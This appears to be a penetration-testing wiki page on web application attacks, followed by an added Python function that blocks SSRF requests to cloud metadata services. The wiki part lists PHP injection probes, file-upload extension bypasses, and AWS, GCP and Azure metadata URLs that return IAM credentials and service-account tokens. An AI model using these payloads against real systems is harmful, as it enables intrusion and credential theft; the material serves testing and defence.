Types of Web Application Attacks

Penetration Testing Wiki

Server-Side Attacks

Client-Side Attacks

  • XSS (Cross-Site Scripting)
  • CSRF (Cross-Site Request Forgery)

HTTP header security

  • HSTS (HTTP Strict Transport Security): protects against man-in-the-middle and downgrade attacks and cookie hijacking in the web browser
  • CORS (Cross-Origin Resource Sharing): restricts cross-domain XHR calls to prevent XSS in the web browser
  • CSP (Content Security Policy): controls which origins and scripts the user agent loads, to prevent XSS in the web browser. https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy

Authentication protocols

SAML Attacks

SAML: Security Assertion Markup Language is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. As its name implies, SAML is an XML-based markup language for security assertions (statements that service providers use to make access-control decisions). The single most important use case that SAML addresses is web browser single sign-on (SSO).

Attacks on SAML protocol

PHP Attacks

Payloads to test injections:

{phpinfo()}.txt
{${phpinfo()}}.txt
{sleep(5)}.txt
NULL byte in octal: \400
NULL byte in hex: \x00

Tricky PHP file upload extensions for bypassing restrictions:

.php3
.php4
.php5
.pht

JavaScript Attacks

Meteor Framework

Meteor.connection._methodHandlers

Reference:
https://www.offensive-security.com/offsec/wekan-authentication-bypass/

SSRF Attacks

Internal URLs by provider: https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b

AWS

  • http://169.254.169.254/latest/user-data
  • http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
  • http://169.254.169.254/latest/meta-data/ami-id
  • http://169.254.169.254/latest/meta-data/reservation-id
  • http://169.254.169.254/latest/meta-data/hostname
  • http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
  • http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
  • http://169.254.169.254/latest/meta-data/
  • http://169.254.169.254/latest/meta-data/public-keys/

GCP

NOTE: Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”

  • http://169.254.169.254/computeMetadata/v1/
  • http://metadata.google.internal/computeMetadata/v1/
  • http://metadata/computeMetadata/v1/
  • http://metadata.google.internal/computeMetadata/v1/instance/hostname
  • http://metadata.google.internal/computeMetadata/v1/instance/id
  • http://metadata.google.internal/computeMetadata/v1/instance/region
  • http://metadata.google.internal/computeMetadata/v1/instance/zone
  • http://metadata.google.internal/computeMetadata/v1/project/project-id
  • http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
  • http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/
  • http://metadata.google.internal/computeMetadata/v1beta1/

Azure

  • http://169.254.169.254/metadata/v1/maintenance

Blind SSRF reference: https://github.com/assetnote/blind-ssrf-chains

More payloads: https://github.com/defensahacker/spinfuzz (Fuzzing lists for webapp pentesting)
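The server-side guard an application needs so that a user-supplied URL can never reach the metadata addresses listed above, as an added example that is not part of this wiki; the function names, the injectable resolver and the sample hosts in the comments are my own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hostnames the cloud metadata services listed above answer on. They never
# resolve to a public address, so a deny-list by name catches them before DNS.
METADATA_HOSTS = {"metadata.google.internal", "metadata"}


def _is_internal(ip: str) -> bool:
    """True for any address an app should not fetch on a user's behalf."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:169.254.169.254 is still the IMDS; unwrap IPv4-mapped IPv6 first.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return (addr.is_link_local or addr.is_private or addr.is_loopback
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def resolve_all(host: str) -> set[str]:
    """Every A/AAAA answer: the check must hold for all of them, not the first."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_outbound_url(url: str, resolver=resolve_all) -> tuple[bool, str]:
    """Return (allowed, reason). `resolver` is injectable so tests run offline."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # lower-cased, brackets stripped from IPv6 literals
    if not host:
        return False, "no host in URL"
    if host.rstrip(".") in METADATA_HOSTS:
        return False, "cloud metadata hostname"
    try:
        ips = {str(ipaddress.ip_address(host))}  # literal IP, no DNS needed
    except ValueError:
        try:
            ips = resolver(host)  # DNS names and non-dotted-quad IP spellings
        except socket.gaierror:
            return False, f"cannot resolve {host}"
    for ip in ips:
        if _is_internal(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"
```

Connect to the exact address the check approved instead of re-resolving the name at request time; otherwise the DNS answer can change between the check and the fetch.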